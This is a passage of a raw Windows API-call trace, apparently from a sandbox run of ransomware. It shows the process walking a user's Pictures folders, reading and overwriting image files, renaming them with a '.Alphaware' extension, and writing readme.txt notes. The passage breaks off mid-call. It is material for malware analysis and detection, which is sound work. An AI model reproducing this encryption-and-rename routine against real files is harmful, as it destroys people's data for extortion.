SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0085.766] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\ZKwJY960tnphZx9R1d2d.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\zkwjy960tnphzx9r1d2d.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc65b13c0, ftCreationTime.dwHighDateTime=0x1d97627, ftLastAccessTime.dwLowDateTime=0x7b0120b0, ftLastAccessTime.dwHighDateTime=0x1d9766b, ftLastWriteTime.dwLowDateTime=0x855127a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1d988)) returned 1 [0085.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0085.766] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\ZKwJY960tnphZx9R1d2d.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\zkwjy960tnphzx9r1d2d.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\ZKwJY960tnphZx9R1d2d.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\zkwjy960tnphzx9r1d2d.jpg.alphaware")) returned 1 [0085.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0085.766] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc27b56f0, ftCreationTime.dwHighDateTime=0x1d96fe4, ftLastAccessTime.dwLowDateTime=0x855127a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x855127a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.767] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d6eb450, ftCreationTime.dwHighDateTime=0x1d971f6, ftLastAccessTime.dwLowDateTime=0x20630d20, ftLastAccessTime.dwHighDateTime=0x1d97423, ftLastWriteTime.dwLowDateTime=0x853e1ca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8d48, dwReserved0=0x0, dwReserved1=0x0, cFileName="dFW79KlkBOtau4aDuO.jpg.Alphaware", cAlternateFileName="DFW79K~1.ALP")) returned 1 [0085.767] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68843ee0, ftCreationTime.dwHighDateTime=0x1d972d8, ftLastAccessTime.dwLowDateTime=0xf775a7d0, ftLastAccessTime.dwHighDateTime=0x1d97565, ftLastWriteTime.dwLowDateTime=0x8547a220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xeda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="H8WEhqDt-nLLYwL7w3.gif.Alphaware", cAlternateFileName="H8WEHQ~1.ALP")) returned 1 [0085.767] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x853e1ca0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x853e1ca0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x853e1ca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0085.767] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3ef3020, ftCreationTime.dwHighDateTime=0x1d971d0, ftLastAccessTime.dwLowDateTime=0xf639770, ftLastAccessTime.dwHighDateTime=0x1d9750d, ftLastWriteTime.dwLowDateTime=0x854c64e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xde88, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vo9MO3eEU2 SLpQJWfM.png.Alphaware", cAlternateFileName="VO9MO3~1.ALP")) returned 1 [0085.767] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc65b13c0, ftCreationTime.dwHighDateTime=0x1d97627, ftLastAccessTime.dwLowDateTime=0x7b0120b0, ftLastAccessTime.dwHighDateTime=0x1d9766b, ftLastWriteTime.dwLowDateTime=0x855127a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1d988, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZKwJY960tnphZx9R1d2d.jpg.Alphaware", cAlternateFileName="ZKWJY9~1.ALP")) returned 1 [0085.767] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc65b13c0, ftCreationTime.dwHighDateTime=0x1d97627, ftLastAccessTime.dwLowDateTime=0x7b0120b0, ftLastAccessTime.dwHighDateTime=0x1d9766b, ftLastWriteTime.dwLowDateTime=0x855127a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1d988, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZKwJY960tnphZx9R1d2d.jpg.Alphaware", cAlternateFileName="ZKWJY9~1.ALP")) returned 0 [0085.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0085.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0085.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0085.767] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18b116d0, ftCreationTime.dwHighDateTime=0x1d96686, ftLastAccessTime.dwLowDateTime=0xe0bfd080, ftLastAccessTime.dwHighDateTime=0x1d97180, ftLastWriteTime.dwLowDateTime=0xe0bfd080, ftLastWriteTime.dwHighDateTime=0x1d97180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.767] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf94ee0, ftCreationTime.dwHighDateTime=0x1d966b0, ftLastAccessTime.dwLowDateTime=0x7f297660, ftLastAccessTime.dwHighDateTime=0x1d971c5, ftLastWriteTime.dwLowDateTime=0x7f297660, ftLastWriteTime.dwHighDateTime=0x1d971c5, nFileSizeHigh=0x0, nFileSizeLow=0x2613, dwReserved0=0x0, dwReserved1=0x0, cFileName="96IsF-4ZdJysw7LW.png", cAlternateFileName="96ISF-~1.PNG")) returned 1 [0085.767] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdd14fc0, ftCreationTime.dwHighDateTime=0x1d96f48, ftLastAccessTime.dwLowDateTime=0xddd49df0, ftLastAccessTime.dwHighDateTime=0x1d974e2, ftLastWriteTime.dwLowDateTime=0xddd49df0, ftLastWriteTime.dwHighDateTime=0x1d974e2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e4W8iO-jmf", cAlternateFileName="E4W8IO~1")) returned 1 [0085.767] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65ddbc20, ftCreationTime.dwHighDateTime=0x1d96b26, ftLastAccessTime.dwLowDateTime=0x88c5e530, ftLastAccessTime.dwHighDateTime=0x1d96fd8, ftLastWriteTime.dwLowDateTime=0x88c5e530, ftLastWriteTime.dwHighDateTime=0x1d96fd8, nFileSizeHigh=0x0, nFileSizeLow=0x11b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4fVjcVZLWVHmLQ.png", cAlternateFileName="Y4FVJC~1.PNG")) returned 1 [0085.767] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0085.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0085.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0085.768] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\96IsF-4ZdJysw7LW.png", dwFileAttributes=0x80) returned 1 [0085.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0085.768] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\96IsF-4ZdJysw7LW.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\96isf-4zdjysw7lw.png"), fInfoLevelId=0x0, lpFileInformation=0x2471218 | out: lpFileInformation=0x2471218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xdf94ee0, ftCreationTime.dwHighDateTime=0x1d966b0, ftLastAccessTime.dwLowDateTime=0x7f297660, ftLastAccessTime.dwHighDateTime=0x1d971c5, ftLastWriteTime.dwLowDateTime=0x7f297660, ftLastWriteTime.dwHighDateTime=0x1d971c5, nFileSizeHigh=0x0, nFileSizeLow=0x2613)) returned 1 [0085.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0085.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0085.768] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\96IsF-4ZdJysw7LW.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\96isf-4zdjysw7lw.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0085.768] ReadFile (in: hFile=0x254, lpBuffer=0x24714a0, nNumberOfBytesToRead=0x2613, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24714a0*, lpNumberOfBytesRead=0x23ea98*=0x2613, lpOverlapped=0x0) returned 1 [0085.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0085.786] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\96IsF-4ZdJysw7LW.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\96isf-4zdjysw7lw.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0085.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0085.790] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\96IsF-4ZdJysw7LW.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\96isf-4zdjysw7lw.png"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf94ee0, ftCreationTime.dwHighDateTime=0x1d966b0, ftLastAccessTime.dwLowDateTime=0x7f297660, ftLastAccessTime.dwHighDateTime=0x1d971c5, ftLastWriteTime.dwLowDateTime=0x85538900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x33a0)) returned 1 [0085.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0085.790] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\96IsF-4ZdJysw7LW.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\96isf-4zdjysw7lw.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\96IsF-4ZdJysw7LW.png.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\96isf-4zdjysw7lw.png.alphaware")) returned 1 [0085.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0085.791] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0085.793] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\y4fVjcVZLWVHmLQ.png", dwFileAttributes=0x80) returned 1 [0085.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0085.793] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\y4fVjcVZLWVHmLQ.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\y4fvjcvzlwvhmlq.png"), fInfoLevelId=0x0, lpFileInformation=0x250d140 | out: lpFileInformation=0x250d140*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x65ddbc20, ftCreationTime.dwHighDateTime=0x1d96b26, ftLastAccessTime.dwLowDateTime=0x88c5e530, ftLastAccessTime.dwHighDateTime=0x1d96fd8, ftLastWriteTime.dwLowDateTime=0x88c5e530, ftLastWriteTime.dwHighDateTime=0x1d96fd8, nFileSizeHigh=0x0, nFileSizeLow=0x11b1)) returned 1 [0085.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0085.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0085.793] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\y4fVjcVZLWVHmLQ.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\y4fvjcvzlwvhmlq.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0085.793] ReadFile (in: hFile=0x254, lpBuffer=0x250d3b8, nNumberOfBytesToRead=0x11b1, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x250d3b8*, lpNumberOfBytesRead=0x23ea98*=0x11b1, lpOverlapped=0x0) returned 1 [0085.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0085.824] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\y4fVjcVZLWVHmLQ.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\y4fvjcvzlwvhmlq.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0085.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0085.827] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\y4fVjcVZLWVHmLQ.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\y4fvjcvzlwvhmlq.png"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65ddbc20, ftCreationTime.dwHighDateTime=0x1d96b26, ftLastAccessTime.dwLowDateTime=0x88c5e530, ftLastAccessTime.dwHighDateTime=0x1d96fd8, ftLastWriteTime.dwLowDateTime=0x855aad20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1874)) returned 1 [0085.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0085.827] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\y4fVjcVZLWVHmLQ.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\y4fvjcvzlwvhmlq.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\y4fVjcVZLWVHmLQ.png.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\y4fvjcvzlwvhmlq.png.alphaware")) returned 1 [0085.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0085.828] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18b116d0, ftCreationTime.dwHighDateTime=0x1d96686, ftLastAccessTime.dwLowDateTime=0x855aad20, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x855aad20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.828] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf94ee0, ftCreationTime.dwHighDateTime=0x1d966b0, ftLastAccessTime.dwLowDateTime=0x7f297660, ftLastAccessTime.dwHighDateTime=0x1d971c5, ftLastWriteTime.dwLowDateTime=0x85538900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x33a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="96IsF-4ZdJysw7LW.png.Alphaware", cAlternateFileName="96ISF-~1.ALP")) returned 1 [0085.828] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdd14fc0, ftCreationTime.dwHighDateTime=0x1d96f48, ftLastAccessTime.dwLowDateTime=0xddd49df0, ftLastAccessTime.dwHighDateTime=0x1d974e2, ftLastWriteTime.dwLowDateTime=0xddd49df0, ftLastWriteTime.dwHighDateTime=0x1d974e2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e4W8iO-jmf", cAlternateFileName="E4W8IO~1")) returned 1 [0085.828] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8555ea60, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8555ea60, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8555ea60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0085.828] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65ddbc20, ftCreationTime.dwHighDateTime=0x1d96b26, ftLastAccessTime.dwLowDateTime=0x88c5e530, ftLastAccessTime.dwHighDateTime=0x1d96fd8, ftLastWriteTime.dwLowDateTime=0x855aad20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1874, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4fVjcVZLWVHmLQ.png.Alphaware", cAlternateFileName="Y4FVJC~1.ALP")) returned 1 [0085.828] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65ddbc20, ftCreationTime.dwHighDateTime=0x1d96b26, ftLastAccessTime.dwLowDateTime=0x88c5e530, ftLastAccessTime.dwHighDateTime=0x1d96fd8, ftLastWriteTime.dwLowDateTime=0x855aad20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1874, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4fVjcVZLWVHmLQ.png.Alphaware", cAlternateFileName="Y4FVJC~1.ALP")) returned 0 [0085.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0085.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0085.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0085.829] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdd14fc0, ftCreationTime.dwHighDateTime=0x1d96f48, ftLastAccessTime.dwLowDateTime=0xddd49df0, ftLastAccessTime.dwHighDateTime=0x1d974e2, ftLastWriteTime.dwLowDateTime=0xddd49df0, ftLastWriteTime.dwHighDateTime=0x1d974e2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.829] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd43b2920, ftCreationTime.dwHighDateTime=0x1d96728, ftLastAccessTime.dwLowDateTime=0x62d9f530, ftLastAccessTime.dwHighDateTime=0x1d96d9b, ftLastWriteTime.dwLowDateTime=0x62d9f530, ftLastWriteTime.dwHighDateTime=0x1d96d9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AZ80w8eAVF6qLdtcVJI", cAlternateFileName="AZ80W8~1")) returned 1 [0085.829] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9153ab40, ftCreationTime.dwHighDateTime=0x1d96e7c, ftLastAccessTime.dwLowDateTime=0xfba38500, ftLastAccessTime.dwHighDateTime=0x1d9722e, ftLastWriteTime.dwLowDateTime=0xfba38500, ftLastWriteTime.dwHighDateTime=0x1d9722e, nFileSizeHigh=0x0, nFileSizeLow=0xdc32, dwReserved0=0x0, dwReserved1=0x0, cFileName="E1l_XrQ6aMcGTT.bmp", cAlternateFileName="E1L_XR~1.BMP")) returned 1 [0085.829] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe481aa50, ftCreationTime.dwHighDateTime=0x1d9720b, ftLastAccessTime.dwLowDateTime=0x5ac001d0, ftLastAccessTime.dwHighDateTime=0x1d97324, ftLastWriteTime.dwLowDateTime=0x5ac001d0, ftLastWriteTime.dwHighDateTime=0x1d97324, nFileSizeHigh=0x0, nFileSizeLow=0x14c56, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlVaW3l8E0FMzi-R4q.gif", cAlternateFileName="MLVAW3~1.GIF")) returned 1 [0085.829] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d0301a0, ftCreationTime.dwHighDateTime=0x1d966f6, ftLastAccessTime.dwLowDateTime=0x618e9fb0, ftLastAccessTime.dwHighDateTime=0x1d96e7b, ftLastWriteTime.dwLowDateTime=0x618e9fb0, ftLastWriteTime.dwHighDateTime=0x1d96e7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NQCf5ew", cAlternateFileName="")) returned 1 [0085.829] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfed4280, ftCreationTime.dwHighDateTime=0x1d96df6, ftLastAccessTime.dwLowDateTime=0x6378c160, ftLastAccessTime.dwHighDateTime=0x1d96f08, ftLastWriteTime.dwLowDateTime=0x6378c160, ftLastWriteTime.dwHighDateTime=0x1d96f08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NqR9nQMJn0 I", cAlternateFileName="NQR9NQ~1")) returned 1 [0085.829] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53081a00, ftCreationTime.dwHighDateTime=0x1d96635, ftLastAccessTime.dwLowDateTime=0xcac76500, ftLastAccessTime.dwHighDateTime=0x1d96775, ftLastWriteTime.dwLowDateTime=0xcac76500, ftLastWriteTime.dwHighDateTime=0x1d96775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oOpoFnm9s", cAlternateFileName="OOPOFN~1")) returned 1 [0085.829] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52d2c890, ftCreationTime.dwHighDateTime=0x1d970fe, ftLastAccessTime.dwLowDateTime=0x81ba1820, ftLastAccessTime.dwHighDateTime=0x1d9711c, ftLastWriteTime.dwLowDateTime=0x81ba1820, ftLastWriteTime.dwHighDateTime=0x1d9711c, nFileSizeHigh=0x0, nFileSizeLow=0x17c7b, dwReserved0=0x0, dwReserved1=0x0, cFileName="V8U50BNOH.bmp", cAlternateFileName="V8U50B~1.BMP")) returned 1 [0085.829] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33fc3cf0, ftCreationTime.dwHighDateTime=0x1d96e09, ftLastAccessTime.dwLowDateTime=0x2bb6e4e0, ftLastAccessTime.dwHighDateTime=0x1d97102, ftLastWriteTime.dwLowDateTime=0x2bb6e4e0, ftLastWriteTime.dwHighDateTime=0x1d97102, nFileSizeHigh=0x0, nFileSizeLow=0x1631b, dwReserved0=0x0, dwReserved1=0x0, cFileName="y252ZTKpdS.jpg", cAlternateFileName="Y252ZT~1.JPG")) returned 1 [0085.829] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0085.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0085.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0085.830] SetFileAttributesW 